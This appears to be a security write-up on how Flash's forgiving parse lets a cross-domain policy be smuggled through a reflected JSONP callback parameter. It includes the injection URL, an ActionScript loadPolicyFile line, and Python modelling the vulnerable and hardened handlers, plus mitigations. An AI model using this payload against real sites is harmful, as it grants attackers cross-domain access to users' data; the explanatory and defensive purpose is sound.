Cross-domain policy files (crossdomain.xml) are forgivingly parsed by Flash: a <cross-domain-policy> element is honored even when it is embedded in other content, such as a JSONP response. So if an attacker can construct an HTTP request that makes a server echo a policy element back in its response, Flash will accept that response as a policy file for the server's domain. For instance, imagine a university website that responds to a course listing request:
http://www.example.com/CourseListing?format=js&callback=<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>

...with the following output (the server URL-decodes the callback parameter, so the %20 comes back as a space):

<cross-domain-policy><allow-access-from domain="*"/></cross-domain-policy>() { return {name:"English101", desc:"Read Books"}, {name:"Computers101", desc:"play on computers"}};

Then one could load this policy via the following ActionScript code:

System.security.loadPolicyFile("http://www.example.com/CourseListing?format=js&callback=<cross-domain-policy>" + "<allow-access-from%20domain=\"*\"/></cross-domain-policy>");

This results in the Flash application having complete cross-domain access to www.example.com: Flash picks the policy element out of the JSONP response and ignores the JavaScript around it. One caveat for anyone testing this against a current target: later Flash Player versions consult the site's master policy file (/crossdomain.xml) first, and a URL policy file like this one is only honored if the master file's site-control permitted-cross-domain-policies meta-policy is "all", or is "by-content-type" and the response is served as text/x-cross-domain-policy; with "master-only" (or "none") the injected policy is ignored.
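As an added illustration, not code from the original post, here is a Python model of both sides of this issue: a hypothetical CourseListing JSONP handler that reflects the callback verbatim next to a hardened version that restricts the callback to a JavaScript identifier, a simplified stand-in for Flash's forgiving parse that pulls a policy element out of whatever surrounds it (a constructed model, not the real parser), and a check of whether the master policy's site-control meta-policy would let such a URL policy file take effect at all. The course data is constructed sample input; the handler names are assumptions.

```python
import json
import re
from urllib.parse import unquote
from xml.etree import ElementTree

# Constructed sample data standing in for the course listing in the post.
COURSES = [
    {"name": "English101", "desc": "Read Books"},
    {"name": "Computers101", "desc": "play on computers"},
]

# The callback value exactly as it appears in the post's URL. The server
# URL-decodes it, which is why %20 turns into a space in the response body.
INJECTED_CALLBACK = unquote(
    '<cross-domain-policy><allow-access-from%20domain="*"/></cross-domain-policy>'
)

# A legitimate JSONP callback is a (possibly dotted) JavaScript identifier.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")


def jsonp_vulnerable(callback, data):
    """Hypothetical CourseListing handler: reflects the callback verbatim.
    Returns (content_type, body)."""
    return "application/javascript", f"{callback}({json.dumps(data)});"


def jsonp_hardened(callback, data):
    """Same handler with the callback restricted to an identifier, so no markup
    (and hence no policy element) can reach the response body."""
    if not SAFE_CALLBACK.match(callback):
        raise ValueError("invalid JSONP callback name")
    return "application/javascript", f"{callback}({json.dumps(data)});"


def hardened_accepts(callback):
    """True if the hardened handler would serve a response for this callback."""
    try:
        jsonp_hardened(callback, COURSES)
        return True
    except ValueError:
        return False


def find_embedded_policy(body):
    """Simplified model of the forgiving parse (not Flash's real parser): take
    the first <cross-domain-policy> element wherever it sits in the body and
    return the domains it grants, or None if the body carries no policy."""
    m = re.search(r"<cross-domain-policy>.*?</cross-domain-policy>", body, re.S)
    if not m:
        return None
    root = ElementTree.fromstring(m.group(0))
    return [e.get("domain") for e in root.findall("allow-access-from")]


def url_policy_honored(meta_policy, content_type):
    """Whether a URL policy file outside /crossdomain.xml is honored under the
    master file's <site-control permitted-cross-domain-policies="..."/> value."""
    if meta_policy == "all":
        return True
    if meta_policy == "by-content-type":
        return content_type == "text/x-cross-domain-policy"
    # "none" and "master-only" never honor a non-master policy file.
    return False


if __name__ == "__main__":
    ctype, body = jsonp_vulnerable(INJECTED_CALLBACK, COURSES)
    print(body)
    print("policy grants:", find_embedded_policy(body))                 # ['*']
    print("honored under master-only:", url_policy_honored("master-only", ctype))  # False
    print("hardened accepts payload:", hardened_accepts(INJECTED_CALLBACK))        # False
```

Run it as-is to see the reflected policy element at the start of the JSONP body. The two fixes are independent and worth applying together: the callback whitelist removes the injection sink, and an explicit <site-control permitted-cross-domain-policies="master-only"/> in /crossdomain.xml means that even a reflected policy elsewhere on the site is never honored.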
via code.google.com